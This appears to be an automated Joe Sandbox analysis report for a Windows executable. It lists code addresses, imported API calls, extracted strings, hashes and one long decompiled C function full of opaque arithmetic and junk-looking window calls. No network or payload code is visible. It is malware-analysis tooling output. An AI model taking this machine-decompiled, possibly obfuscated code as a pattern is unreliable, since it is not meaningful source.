0x0040936d
0x00409370
0x00409377
0x0040937e
0x00409381
0x0040938a
0x0040938d
0x00409394
0x0040939a
0x0040939d
0x004093a2
0x004093ac
0x004093b2
0x004093b5
0x004093c4
0x004093e8
0x004093ed
0x004093f3
0x004093f6
0x0040955e
0x00000000
0x004093fc
0x00409402
0x00409402
0x00409408
0x0040940e
0x00409414
0x0040941f
0x0040942a
0x0040943a
0x0040943f
0x0040944c
0x0040944e
0x0040945d
0x0040945f
0x0040946c
0x00409472
0x0040947c
0x0040947e
0x004094ae
0x004094b4
0x004094b6
0x004094e0
0x004094e5
0x004094e8
0x004094ee
0x0040950b
0x0040950b
0x0040950d
0x00409512
0x00409519
0x00409536
0x0040953c
0x0040953f
0x0040953f
0x00000000
0x0040953f
0x004094c4
0x004094c6
0x004094d5
0x004094d8
0x00000000
0x004094d8
0x00409480
0x00409485
0x00409488
0x0040948d
0x00409494
0x004094a6
0x00000000
0x00409545
0x00409548
0x00409549
0x00409552
0x00409552
0x0040955a
0x00409564
0x00409564
0x00409567
0x00409569
0x0040956c
0x00409571
0x00409571
0x00409577
0x0040957d
0x00409585
0x0040958d
0x00409596
0x0040959c
0x004095a2
0x004095a8
0x004095ac
0x004095b3
0x004095b9
0x004095c6
0x004095ce
0x004095d4
0x004095dd
0x004095dd
0x004095dd
0x004095e3
0x004095e8
0x004095f2
0x004095fd
0x00409611
0x00409617
0x0040961d
0x0040961f
0x00409621
0x0040962d
0x0040962d
0x0040962f
0x0040962f
0x0040963e
0x0040964e
0x00409654
0x00409666
0x00409669
0x00409669
0x0040966b
0x00409656
0x00409656
0x00409656
0x004096a9
0x004096ab
0x004096ad
0x004096af
0x004096b1
0x004096b1
0x004096dd
0x004096e3
0x004096e6
0x004096e8
0x004096f2
0x004096f2
0x004096ea
0x004096ea
0x004096ea
0x004096f5
0x004096f8
0x004096fa
0x004096fb
0x004096fd
0x00409704
0x00409709
0x0040970e
0x00409718
0x00409720
0x00409722
0x00409736
0x00409739
0x0040973c
0x0040973f
0x00409748
0x00409749
0x0040974c
0x00409760
0x00409767
0x00409778
0x0040977b
0x0040977e
0x00409790
0x00409793
0x00409796
0x004097ac
0x004097af
0x004097b2
0x004097b9
0x004097c3
0x004097c9
0x004097cd
0x004097da
0x004097df
0x004097e9
0x004097f8
0x00409805
0x00409808
0x0040980c
0x00409816
0x00409819
0x0040981e
0x00409831
0x00409849
0x0040984b
0x0040984d
0x0040984f
0x00409852
0x00409855
0x00409855
0x00409861
0x00409873
0x0040988d
0x00409893
0x00409895
0x00409898
0x004098b5
0x0040989a
0x0040989a
0x0040989f
0x0040989f
0x004098c4
0x004098ca
0x004098cc
0x004098ea
0x004098ef
0x004098ce
0x004098e3
0x004098e3
0x004098f6
0x004098fc
0x00409929
0x00409930
0x00409936
0x00409956
0x00409958
0x0040995a
0x0040995a
0x00409973
0x00409975
0x0040997e
0x00409981
0x00409984
0x00409987
0x00409989
0x00409994
0x00409994
0x004099b0
0x004099b3
0x004099b8
0x004099ba
0x004099d0
0x004099d3
0x004099d9
0x004099f5
0x004099fb
0x00409a01
0x00409a01
0x00409a03
0x004099db
0x004099db
0x004099e7
0x004099ed
0x004099ed
0x004099bc
0x004099bc
0x004099c2
0x004099c8
0x004099c8
0x00409a09
0x00409a0d
0x00409a13
0x00409a21
0x00409a2b
0x00409a31
0x00409a34
0x00409a36
0x00409a38
0x00409a5c
0x00409a5c
0x00409a61
0x00000000
0x00409a3a
0x00409a3a
0x00409a40
0x00000000
0x00000000
0x00409a43
0x00409a4b
0x00409a52
0x00409a55
0x00409a58
0x00409a63
0x00409a63
0x00409a6f
0x00409a75
0x00409b95
0x00409b95
0x00409b97
0x00409b9d
0x00409b9f
0x00409b9f
0x00409ba2
0x00409ba8
0x00409baa
0x00409bb0
0x00409bb0
0x00409bb3
0x00409bb6
0x00409cc4
0x00409cc4
0x00409cdc
0x00409ce2
0x00409ced
0x00409cf3
0x00409cfb
0x00409d01
0x00409d03
0x00409d06
0x00409d0b
0x00409d2d
0x00409d33
0x00409d33
0x00409d33
0x00409d35
0x00409d3b
0x0040a1ae
0x0040a1b2
0x0040a1d2
0x0040a1e6
0x0040a1f2
0x0040a200
0x0040a207
0x0040a220
0x0040a234
0x0040a23b
0x0040a242
0x0040a245
0x0040a25c
0x0040a262
0x0040a26b
0x0040a26b
0x0040a271
0x0040a27a
0x0040a27f
0x0040a282
0x0040a299
0x0040a29f
0x0040a2b6
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2e2
0x0040a2e2
0x0040a2e4
0x0040a2e4
0x0040a2ea
0x0040a2f0
0x0040a2f6
0x0040a2f8
0x0040a2fd
0x0040a300
0x0040a300
0x0040a306
0x0040a30c
0x0040a30e
0x0040a313
0x0040a313
0x0040a31a
0x0040a320
0x0040a320
0x0040a320
0x0040a323
0x00000000
0x00000000
0x0040a2b0
0x0040a2b0
0x0040a37c
0x00000000
0x00409d41
0x00409d41
0x00409d47
0x00409d48
0x00409d4b
0x00409d50
0x00409d53
0x00409d55
0x00409d58
0x00409d58
0x00409d66
0x00409d6c
0x00409d6f
0x00409d72
0x00409d75
0x00409d75
0x00409d77
0x0040a0b0
0x0040a0b0
0x0040a0b7
0x0040a103
0x0040a105
0x0040a105
0x0040a108
0x0040a108
0x0040a10c
0x0040a124
0x0040a12a
0x0040a12a
0x0040a12d
0x0040a12d
0x0040a12f
0x0040a156
0x0040a159
0x0040a15c
0x00000000
0x00000000
0x0040a15e
0x0040a164
0x0040a164
0x0040a167
0x00000000
0x00000000
0x0040a169
0x0040a16c
0x0040a16f
0x0040a17b
0x0040a183
0x0040a183
0x0040a185
0x0040a185
0x0040a188
0x0040a18b
0x00000000
0x00000000
0x00000000
0x0040a18b
0x0040a171
0x0040a174
0x00000000
0x00000000
0x0040a176
0x0040a179
0x00000000
0x00000000
0x00000000
0x0040a179
0x0040a18d
0x00000000
0x0040a131
0x0040a13a
0x0040a13f
0x0040a14e
0x0040a151
0x0040a190
0x0040a190
0x0040a193
0x00000000
0x00000000
0x00000000
0x0040a193
0x0040a12f
0x0040a0d0
0x0040a0d6
0x0040a0d9
0x0040a0db
0x00000000
0x00000000
0x0040a0dd
0x0040a0e2
0x00000000
0x00000000
0x0040a0e4
0x0040a0e6
0x0040a0e8
0x0040a0fa
0x0040a0fa
0x0040a0fc
0x00000000
0x00000000
0x0040a0fe
0x00000000
0x0040a0fe
0x0040a0f0
0x0040a0f0
0x0040a0f5
0x00000000
0x00000000
0x0040a0f7
0x0040a0f7
0x0040a0f8
0x00000000
0x00000000
0x00000000
0x0040a0f8
0x00000000
0x0040a0f0
0x00409d7d
0x00409d80
0x00409d82
0x00000000
0x00000000
0x00409d90
0x00409d90
0x00409d93
0x00409d96
0x00000000
0x00000000
0x00409d9c
0x00409d9f
0x00000000
0x00000000
0x00409da5
0x00409da8
0x0040a096
0x0040a099
0x00000000
0x00000000
0x0040a09b
0x0040a09b
0x0040a09f
0x0040a09f
0x0040a0a0
0x0040a0a0
0x0040a0a3
0x00000000
0x00000000
0x0040a0a5
0x0040a0a8
0x0040a0aa
0x00000000
0x00000000
0x00000000
0x0040a0aa
0x00409dae
0x00409db4
0x00000000
0x00000000
0x00409dbf
0x00409dc3
0x00409dc4
0x00409dca
0x00000000
0x00000000
0x00409dd0
0x00409dd2
0x00409dd6
0x00409dd7
0x00409ddd
0x00000000
0x00000000
0x00409de3
0x00409de7
0x00409de8
0x00409dee
0x00000000
0x00000000
0x00000000
0x00409df4
0x00000000
0x0040a195
0x0040a195
0x0040a195
0x0040a19e
0x0040a1a2
0x0040a1a8
0x0040a1a8
0x00000000
0x0040a1a2
0x00409bbc
0x00409bbc
0x00409bc6
0x00409bcc
0x00409bd5
0x00409bdb
0x00409be1
0x00409beb
0x00409bf1
0x00409bf7
0x00409bfd
0x00409c03
0x00409c09
0x00409c14
0x00409c1b
0x00409c21
0x00409c27
0x00409c2d
0x00409c36
0x00409c36
0x00409c43
0x00409c49
0x00409c5d
0x00409c5f
0x00409c64
0x00409c6a
0x00409c7a
0x00409c88
0x00409c8e
0x00409c91
0x00409c97
0x00409c9f
0x00409c9f
0x00409ca0
0x00409e06
0x00409e34
0x00409e3a
0x00409e57
0x00409e5e
0x00409e74
0x00409e88
0x00409e93
0x00409e95
0x00409e9c
0x00409ea3
0x00409eaf
0x00409eb2
0x00409ec5
0x00409ec7
0x00409eca
0x00409edd
0x00409edf
0x00409ee6
0x00409ee9
0x00409efc
0x00409efe
0x00409f0a
0x00409f10
0x00409f16
0x00409f1c
0x00409f22
0x00409f28
0x00409f3c
0x00409f3e
0x00409f48
0x00409f52
0x00409f6b
0x00409f6d
0x00409f77
0x00409f8c
0x00409f90
0x00409f96
0x00409fa0
0x00409fa6
0x00409fba
0x00409fbc
0x00409fc6
0x00409fd0
0x00409fe9
0x00409feb
0x00409ff5
0x0040a00a
0x0040a00c
0x0040a016
0x0040a020
0x0040a02a
0x0040a03f
0x0040a041
0x0040a04b
0x0040a055
0x0040a05f
0x0040a06e
0x0040a070
0x0040a07a
0x0040a08f
0x00000000
0x00409ca6
0x00409ca6
0x00409ca7
0x00409dfb
0x0040a383
0x0040a383
0x0040a383
0x00000000
0x0040a383
0x00409cad
0x00409cb4
0x00409cbc
0x00409cc2
0x00409cc2
0x00000000
0x00409cc2
0x00409ca0
0x00409bb6
0x00409a7b
0x00409a81
0x00409a87
0x00409a8d
0x00409a90
0x00409a97
0x00409a9d
0x00409aa0
0x00409aa6
0x00409abb
0x00409ac1
0x00409ac7
0x00409ac9
0x00409b93
0x00409b93
0x00409b93
0x00000000
0x00409b93
0x00409acf
0x00409ad4
0x00409ada
0x00409ae0
0x00409ae2
0x00409ae2
0x00409ae3
0x00409ae3
0x00409ae6
0x00409aed
0x00409aef
0x00409af5
0x00409afe
0x00409b03
0x00409b09
0x00409b0f
0x00409b11
0x00409b13
0x00409b1f
0x00409b26
0x00409b26
0x00409b45
0x00409b49
0x00409b4c
0x00409b4f
0x00409b51
0x00409b61
0x00409b53
0x00409b56
0x00409b59
0x00409b59
0x00409b81
0x00409b87
0x00409b88
0x00409b8b
0x00409b8b
0x00409af5
0x00000000
0x00409aef
0x00409a38
0x00409810
0x00000000
0x00000000
0x00000000
0x004097cd
0x00409039
0x00409039
0x00409040
0x00409045
0x00409046
0x00409050
0x00000000
0x00409056
0x00000000
0x00409060
0x00409067
0x004092ac
0x004092af
0x004092b0
0x004092b3
0x004092b8
0x004092b9
0x004092c3
0x004092d7
0x00000000
0x004092d7
0x004092c5
0x00000000
0x004092c5
0x0040906d
0x00409073
0x00409076
0x0040907a
0x004090e3
0x004090e3
0x004090ea
0x004090f6
0x00409106
0x00409108
0x0040910e
0x0040911c
0x00409147
0x0040914b
0x00409152
0x00409166
0x0040917d
0x00409190
0x0040919b
0x004091a1
0x004091a8
0x004091d9
0x004091d9
0x004091e2
0x004092cd
0x004092cd
0x0040a385
0x0040a388
0x0040a390
0x0040a391
0x0040a392
0x0040a399
0x0040a3a7
0x0040a3a7
0x004091eb
0x004091f1
0x00000000
0x00000000
0x004091fa
0x00409200
0x00000000
0x00409213
0x00409216
0x0040921c
0x00409221
0x00409229
0x00409229
0x0040922f
0x00409237
0x00409239
0x00409239
0x00409246
0x004097cf
0x004097d1
0x0040924c
0x0040924c
0x00409253
0x00409290
0x00409255
0x0040925a
0x0040927e
0x0040927e
0x0040925a
0x0040929d
0x0040929f
0x004092a5
0x004092aa
0x004092aa
0x00000000
0x0040929d
0x00409246
0x00409200
0x004091af
0x004091b5
0x004091b8
0x004091c0
0x004091c0
0x004091d5
0x00000000
0x004091b5
0x0040907c
0x00409082
0x00409089
0x004090a5
0x004090aa
0x004090b7
0x004090bc
0x004090bc
0x004090c9
0x004090cb
0x004090d1
0x004090d1
0x004090d7
0x004090d8
0x004090db
0x004090e0
0x00000000
0x004090e0
0x00409060
0x00409050
0x00408bcd
0x00408bcd
0x00408bd2
0x00408bf8
0x00408bfe
0x00408c00
0x00408c03
0x00408c06
0x00408c09
0x00408c0c
0x00408c0f
0x00408c16
0x00408c24
0x00408c2e
0x00000000
0x00000000
0x00408c34
0x00408c3e
0x00000000
0x00000000
0x00408c44
0x00408c4e
0x00000000
0x00000000
0x00408c57
0x00408cce
0x00408cce
0x00000000
0x00408c63
0x00408c63
0x00408c6d
0x00000000
0x00000000
0x00408c72
0x00408cd1
0x00408cd1
0x00000000
0x00408c7e
0x00408c7e
0x00408c88
0x00000000
0x00000000
0x00408c8d
0x00408cd6
0x00408cd6
0x00000000
0x00408c99
0x00408c99
0x00408ca3
0x00000000
0x00000000
0x00408ca8
0x00408cdb
0x00408cdb
0x00000000
0x00408cbe
0x00408cbe
0x00408cc6
0x00000000
0x00408ccc
0x00000000
0x00408ccc
0x00408cc6
0x00408ca8
0x00408c8d
0x00408c72
0x00408c57
0x00408ce3
0x00000000
0x00000000
0x00408cfb
0x00408cff
0x00408d05
0x00408d08
0x00408d0b
0x00408d0e
0x00408d11
0x00408d14
0x00408d1b
0x00408d20
0x00408d2e
0x00408d37
0x00000000
0x00000000
0x00408d3d
0x00408d46
0x00000000
0x00000000
0x00408d48
0x00408d51
0x00000000
0x00000000
0x00408d56
0x00408db7
0x00408db7
0x00000000
0x00408d61
0x00408d61
0x00408d6a
0x00000000
0x00000000
0x00408d6e
0x00408dba
0x00408dba
0x00000000
0x00408d75
0x00408d75
0x00408d7e
0x00000000
0x00000000
0x00408d83
0x00408dbf
0x00408dbf
0x00000000
0x00408d89
0x00408d89
0x00408d92
0x00000000
0x00000000
0x00408d97
0x00408dc4
0x00408dc4
0x00000000
0x00408da6
0x00408da6
0x00408daf
0x00000000
0x00408db5
0x00000000
0x00408db5
0x00408daf
0x00408d97
0x00408d83
0x00408d6e
0x00408d56
0x00408dcd
0x00408ddd
0x00408de1
0x00408dea
0x00408df0
0x00408df3
0x00408e25
0x00408e25
0x00408de1
0x00408dcd
0x00408cff
0x00000000
0x00408bd2

APIs

mmioSeek.WINMM(00000000,00000000,00000000,B51EC2B3,00000000,?,?), ref: 00408BF8
mmioDescend.WINMM(?,?,00000000,00000020), ref: 00408CFB
mmioDescend.WINMM(?,?,?,00000010), ref: 00408DDD
mmioSeek.WINMM(?,00000000,00000001), ref: 00408DEA
mmioClose.WINMM(?,00000000,B51EC2B3,00000000,?,?), ref: 00408E2E
CreateFileA.KERNEL32(00462A28,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408E4B
GetFileSize.KERNEL32(00000000,00000000), ref: 00408E5C
SetFilePointer.KERNEL32(00000000,00000080,00000000,00000002), ref: 00408E6F
ReadFile.KERNELBASE(00000000,?,00000080,?,00000000), ref: 00408E84
CloseHandle.KERNEL32(00000000), ref: 00408E8F
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00408EA4
ReadFile.KERNELBASE(00000000,?,0000000A,?,00000000), ref: 00408EB3
SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00408F0F
ClientToScreen.USER32(00000000,?), ref: 00408F1C
WindowFromPoint.USER32(?,?), ref: 00408F2A
GetActiveWindow.USER32 ref: 00408F30
PlaySoundA.WINMM(00462A28,00000789,FFF48EBD), ref: 00408F49
_TrackMouseEvent.COMCTL32(?), ref: 00408F69
GetDlgItem.USER32 ref: 00408FE9
lstrcpyW.KERNEL32 ref: 00409008
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00409021
midiInGetNumDevs.WINMM(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040906D

Strings

SysListView32, xrefs: 00409E27
H+F, xrefs: 0040965E
VUUU, xrefs: 00409B32
close, xrefs: 00409888
RMP3, xrefs: 00408C0F
gfff, xrefs: 0040A248
empty, xrefs: 00409451
open, xrefs: 0040983C
MS Shell Dlg, xrefs: 00409671
data, xrefs: 00408D14
file, xrefs: 00409837
mem, xrefs: 00409975
Arial, xrefs: 0040911F
ntdll, xrefs: 0040999E
map, xrefs: 00409171
cpy, xrefs: 0040998B
BUTTON, xrefs: 004096D6

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: File$mmio$Pointer$CloseDescendReadSeekWindow$ActiveClientCreateCurrentDevsDirectoryEventFromHandleItemMousePlayPointScreenSizeSoundTracklstrcpymidi
String ID: Arial$BUTTON$H+F$MS Shell Dlg$RMP3$SysListView32$VUUU$close$cpy$data$empty$file$gfff$map$mem$ntdll$open
API String ID: 3785978494-1810084684
Opcode ID: 9175538e915391df3eefe1421e941233c3fdcacb6f8fb5ffeacc0411b7220701
Instruction ID: 95e60aab7464f2c0f80ed7ff6751734f21a88d786fd69a21f1c7a5852b2ce119
Opcode Fuzzy Hash: 9175538e915391df3eefe1421e941233c3fdcacb6f8fb5ffeacc0411b7220701
Instruction Fuzzy Hash: 75E2A171A00344AFDB24CF54DD85BEA77B5FB49701F04813AE905AB2E1E7B8A940CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC10 Relevance: 93.4, APIs: 47, Strings: 6, Instructions: 687
windowCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040AC10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				signed int _t211;
				signed int _t213;
				intOrPtr _t216;
				long _t217;
				int _t220;
				int _t223;
				struct HWND__* _t232;
				signed int _t243;
				int _t244;
				struct HWND__* _t249;
				long _t250;
				intOrPtr* _t253;
				intOrPtr* _t257;
				signed short _t266;
				int _t269;
				int _t280;
				int _t283;
				signed int _t292;
				intOrPtr _t309;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				long _t328;
				long _t329;
				signed int _t332;
				signed int _t335;
				int _t337;
				long _t343;
				void* _t363;
				void* _t368;
				signed int _t381;
				struct HWND__* _t383;
				signed char _t384;
				signed int _t392;
				void* _t393;
				void* _t396;
				signed char _t402;
				intOrPtr* _t407;
				int _t415;
				struct HWND__* _t416;
				signed int _t425;
				signed int _t427;
				long _t429;
				signed int _t432;
				signed char _t438;
				signed char _t442;
				struct tagRECT* _t450;
				signed int _t460;
				struct HWND__* _t463;
				intOrPtr _t475;
				signed int _t476;
				signed int _t506;
				struct HMENU__* _t509;
				signed short _t510;
				struct HWND__* _t512;
				void* _t513;
				struct HWND__* _t516;
				signed int _t517;
				void* _t518;
				void* _t522;
				struct HWND__* _t524;
				signed int _t529;
				struct HWND__* _t534;
				struct HWND__* _t536;
				signed short _t539;
				struct HRSRC__* _t541;
				void* _t542;
				struct HWND__* _t543;
				long _t545;
				struct HWND__* _t546;
				signed short _t549;
				struct HINSTANCE__* _t550;
				void* _t551;
				int _t553;
				void* _t554;
				void* _t556;
				signed int _t557;
				void* _t558;
				long long* _t559;
				void* _t560;
				void* _t561;
				signed int _t562;
				void* _t569;
				void* _t593;
				struct HWND__* _t594;
				struct HWND__* _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				void* _t599;
				signed long long _t601;

				_t593 = __fp0;
				_push(0xffffffff);
				_push(E0044E156);
				_push( *[fs:0x0]);
				_t557 = _t556 - 0x178;
				_t211 =  *0x4608e0; // 0xb51ec2b3
				 *(_t557 + 0x174) = _t211 ^ _t557;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t213 =  *0x4608e0; // 0xb51ec2b3
				_push(_t213 ^ _t557);
				 *[fs:0x0] = _t557 + 0x18c;
				_t216 =  *((intOrPtr*)(_t557 + 0x19c));
				_t383 = 0;
				 *((intOrPtr*)(_t557 + 0x2c)) = _t216;
				if(_t216 == 0) {
					_t363 =  *0x4631ec; // 0x0
					 *(_t557 + 0x28) = _t363;
					_t545 = ImageList_Create(0x10, 0x10, 0, 3, 0);
					if(_t545 == 0) {
						 *0x460334 = 0;
					}
					_t554 = LoadBitmapA(_t383,  *(_t557 + 0x24) & 0x0000ffff);
					ImageList_Add(_t545, _t554, _t383);
					DeleteObject(_t554);
					_t368 = LoadBitmapA(0,  *(_t557 + 0x24) & 0x0000ffff);
					 *(_t557 + 0x28) = _t368;
					ImageList_Add(_t545, _t368, 0);
					DeleteObject( *(_t557 + 0x1c));
					_t522 = LoadBitmapA(0,  *(_t557 + 0x24) & 0x0000ffff);
					ImageList_Add(_t545, _t522, 0);
					DeleteObject(_t522);
					if(ImageList_GetImageCount(_t545) < 3) {
						_t510 =  *0x463200; // 0x211
						 *0x460334 = _t510;
					}
					SendMessageA( *(_t557 + 0x14), 0x1109, 0, _t545);
					_t546 =  *0x4631ec; // 0x0
					GetClientRect(_t546, _t557 + 0x74);
					_t509 =  *0x46320c; // 0x0
					CreateWindowExA(0, "SysTreeView32", "Tree View", 0x50800007, 0, 0,  *(_t557 + 0x7c),  *(_t557 + 0x80), _t546, _t509, 0, 0);
					_t381 =  *0x4631e4; // 0x0
					_push(0);
					_t449 = _t557 + 0x28;
					_t396 = _t557 + 0x68;
					_push(_t557 + 0x28);
					if( *0x46320c == 0) {
						_push(0);
						_push(_t396);
						_push(_t381);
						L0040D6E0();
					} else {
						_push(_t396);
						_push(_t381);
						L0040D6E6();
					}
					_t383 = 0;
				}
				_t217 = 0;
				 *(_t557 + 0x1c) = _t383;
				 *((intOrPtr*)(_t557 + 0x78)) = 0;
				 *(_t557 + 0x7c) = 0;
				 *(_t557 + 0x80) = 0;
				 *(_t557 + 0x54) = _t383;
				 *((intOrPtr*)(_t557 + 0x58)) = 0;
				 *((intOrPtr*)(_t557 + 0x5c)) = 0;
				 *((intOrPtr*)(_t557 + 0x44)) = 0;
				 *((intOrPtr*)(_t557 + 0x48)) = 0;
				 *((intOrPtr*)(_t557 + 0x4c)) = 0;
				_t569 =  *0x4631f4 - _t217; // -67
				if(_t569 == 0) {
					asm("fldz");
					E004238B0(_t396, _t449, _t593);
					 *(_t557 + 0x14) = _t593;
					_t601 =  *(_t557 + 0x14);
					_t506 =  *0x46320c; // 0x0
					 *(_t557 + 0x14) = _t601;
					asm("fild dword [0x4631ec]");
					asm("fnstcw word [esp+0x1c]");
					 *(_t557 + 0x14) = _t506 + 0x3a;
					asm("fidiv dword [esp+0x14]");
					 *(_t557 + 0x14) =  *0x4631e4 & 0x000000ff;
					_t217 =  *(_t557 + 0x1c) & 0x0000ffff | 0x00000c00;
					asm("fild dword [esp+0x14]");
					 *(_t557 + 0x14) = _t217;
					asm("faddp st1, st0");
					_t593 = _t601 *  *(_t557 + 0x14) +  *0x451738;
					asm("fldcw word [esp+0x14]");
					asm("fistp qword [esp+0x24]");
					asm("fldcw word [esp+0x1c]");
					 *(_t557 + 0x1c) =  *(_t557 + 0x24);
				}
				__imp__IsWinEventHookInstalled(_t383);
				_t524 =  *0x4631ec; // 0x0
				 *0x46320c = _t383;
				__imp__OpenThemeData(_t524, L"EDIT");
				SetWindowLongA(_t524, 0xffffffeb, _t217);
				_t512 =  *0x4631ec; // 0x0
				_t450 = _t557 + 0x64;
				GetWindowRect(_t512, _t450);
				_t220 = GetSystemMetrics(_t383);
				asm("cdq");
				_t223 = GetSystemMetrics(1);
				asm("cdq");
				SetWindowPos(_t512, _t383, _t220 +  *(_t557 + 0x64) -  *((intOrPtr*)(_t557 + 0x6c)) - _t450 >> 1, _t223 +  *((intOrPtr*)(_t557 + 0x68)) -  *((intOrPtr*)(_t557 + 0x70)) -  *((intOrPtr*)(_t557 + 0x68)) -  *((intOrPtr*)(_t557 + 0x70)) >> 1, _t383, _t383, 1);
				asm("fild dword [esp+0x54]");
				 *(_t557 + 0x14) = 0x2820;
				 *(_t557 + 0x24) = _t593;
				asm("fild dword [esp+0x80]");
				E00423E20( *(_t557 + 0x64) -  *((intOrPtr*)(_t557 + 0x6c)), _t593);
				asm("fimul dword [esp+0x44]");
				_t384 =  *0x4631e4; // 0x0
				asm("fiadd dword [esp+0x14]");
				 *(_t557 + 0x14) = ((0xb21642c9 * _t384 >> 0x20) + _t384 >> 4 >> 0x1f) + ((0xb21642c9 * _t384 >> 0x20) + _t384 >> 4);
				asm("fild dword [esp+0x14]");
				asm("fsubp st1, st0");
				asm("fiadd dword [0x460334]");
				asm("fsubr qword [esp+0x24]");
				_t232 = E00423D70(0xb21642c9 * _t384, _t593);
				_t402 =  *0x4631f0; // 0x3b8402f
				_t529 =  *0x463200; // 0x211
				 *(_t557 + 0x54) = _t232;
				if(0x2820 + _t402 == 0) {
					asm("cdq");
					_t460 =  *0x4631f4; // 0xfff48ebd
					_t243 = _t384 / (_t529 + 0x63) *  *0x4631dc - (0x2aaaaaab * ( *0x462f60 & 0x0000ffff) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *0x462f60 & 0x0000ffff) >> 0x20 >> 2) + _t460 * 2 + ( *0x46320c & 0x0000ffff) + (_t402 & 0x000000ff) + 0x20;
					__eflags = _t243;
				} else {
					asm("cdq");
					_t243 = 0x28 / (_t529 + 0x5a) *  *0x4631f4 + (_t384 & 0x000000ff) *  *0x46320c - _t402;
				}
				_t463 =  *0x4631ec; // 0x0
				 *0x4631f4 = _t243;
				_t244 = IsZoomed(_t463);
				asm("fild dword [esp+0x54]");
				 *0x4631e4 = _t244;
				_t513 = 0xf;
				 *(_t557 + 0x14) = _t593;
				_t594 =  *(_t557 + 0x14);
				E004239DC(_t594);
				 *(_t557 + 0x14) = _t594;
				_t595 =  *(_t557 + 0x14);
				 *(_t557 + 0x14) = _t595;
				 *(_t557 + 0x24) = 0;
				asm("fild dword [esp+0x24]");
				if(0 < 0) {
					_t595 = _t595 +  *0x451a80;
				}
				_t247 =  *(_t557 + 0x1c);
				_t596 = _t595 +  *(_t557 + 0x14);
				asm("fild dword [esp+0x1c]");
				if( *(_t557 + 0x1c) < 0) {
					_t596 = _t596 +  *0x451a80;
				}
				asm("fsubp st1, st0");
				 *(_t557 + 0x14) = E00423D70(_t247, _t596);
				do {
					_t249 = GetForegroundWindow(); // executed
					_t534 = _t249;
					_t250 = GetWindowLongA(_t534, 0xfffffffc);
					SetActiveWindow(_t534);
					SetWindowLongA(_t534, 0xfffffffc, _t250);
					_t513 = _t513 - 1;
					_t574 = _t513;
					 *0x4631d8 =  *(_t557 + 0x14);
				} while (_t513 != 0);
				_push(0x18);
				 *((intOrPtr*)(_t557 + 0x3c)) = 0;
				_t253 = E00422C34(_t463, _t513, 0, _t574);
				_t558 = _t557 + 4;
				if(_t253 == 0) {
					 *((intOrPtr*)(_t558 + 0x28)) = 0;
					E00422354(_t558 + 0x68, _t558 + 0x24);
					_t407 = _t558 + 0x68;
					 *((intOrPtr*)(_t558 + 0x6c)) = 0x451444;
					E00422CB4(_t407, 0x459510);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t257 = _t407;
					 *((intOrPtr*)(_t257 + 4)) =  *((intOrPtr*)(_t558 + 4));
					 *_t257 = 0x451ab0;
					return _t257;
				} else {
					 *((intOrPtr*)(_t558 + 0x34)) = _t253;
					 *_t253 = _t253;
					 *((intOrPtr*)( *((intOrPtr*)(_t558 + 0x34)) + 4)) =  *((intOrPtr*)(_t558 + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t558 + 0x34)) + 8)) =  *((intOrPtr*)(_t558 + 0x34));
					 *((char*)( *((intOrPtr*)(_t558 + 0x34)) + 0x14)) = 1;
					 *((char*)( *((intOrPtr*)(_t558 + 0x34)) + 0x15)) = 1;
					_push(_t558 + 0x14);
					_push(_t558 + 0x20);
					 *((intOrPtr*)(_t558 + 0x19c)) = 0;
					 *((intOrPtr*)(_t558 + 0x1c)) = 0x1d;
					 *((intOrPtr*)(_t558 + 0x20)) = 6;
					E0040AB30(_t558 + 0x38, _t513);
					asm("fild dword [esp+0x4c]");
					_t559 = _t558 - 8;
					 *(_t559 + 0x1c) = _t596;
					_t597 =  *(_t559 + 0x1c);
					 *_t559 = _t597;
					E00423750(_t513);
					 *(_t559 + 0x1c) = _t597;
					_t598 =  *(_t559 + 0x1c);
					 *((intOrPtr*)(_t559 + 0x24)) = _t598;
					 *(_t559 + 0x1c) =  *0x462f8c & 0x000000ff;
					_t560 = _t559 + 8;
					asm("fild dword [esp+0x14]");
					 *(_t560 + 0x14) =  *0x4631f8 & 0x000000ff;
					_push(_t560 + 0x14);
					_t599 = _t598 -  *(_t560 + 0x20);
					asm("fild dword [esp+0x18]");
					asm("fnstcw word [esp+0x20]");
					asm("fsubp st1, st0");
					 *(_t560 + 0x18) =  *(_t560 + 0x20) & 0x0000ffff | 0x00000c00;
					_t266 =  *0x463204; // 0x4
					asm("fldcw word [esp+0x18]");
					asm("fistp qword [esp+0x18]");
					 *0x4631f8 =  *(_t560 + 0x18);
					_push(_t560 + 0x20);
					asm("fldcw word [esp+0x24]");
					 *(_t560 + 0x1c) = 1;
					 *(_t560 + 0x20) = _t266;
					E0040AB30(_t560 + 0x34, _t513);
					E0040A9B0(_t560 + 0x30);
					_t269 =  *0x4631dc; // 0x2ad58
					_t415 =  *0x460334; // 0xc30c4
					ImageList_Create(0x10, _t415, 0, _t269, 0);
					_t416 =  *0x463210; // 0x0
					asm("cdq");
					_t536 =  *0x4631ec; // 0x0
					 *0x463200 = 0x211;
					_t419 =  *(_t560 + 0x54) & 0x0000ffff;
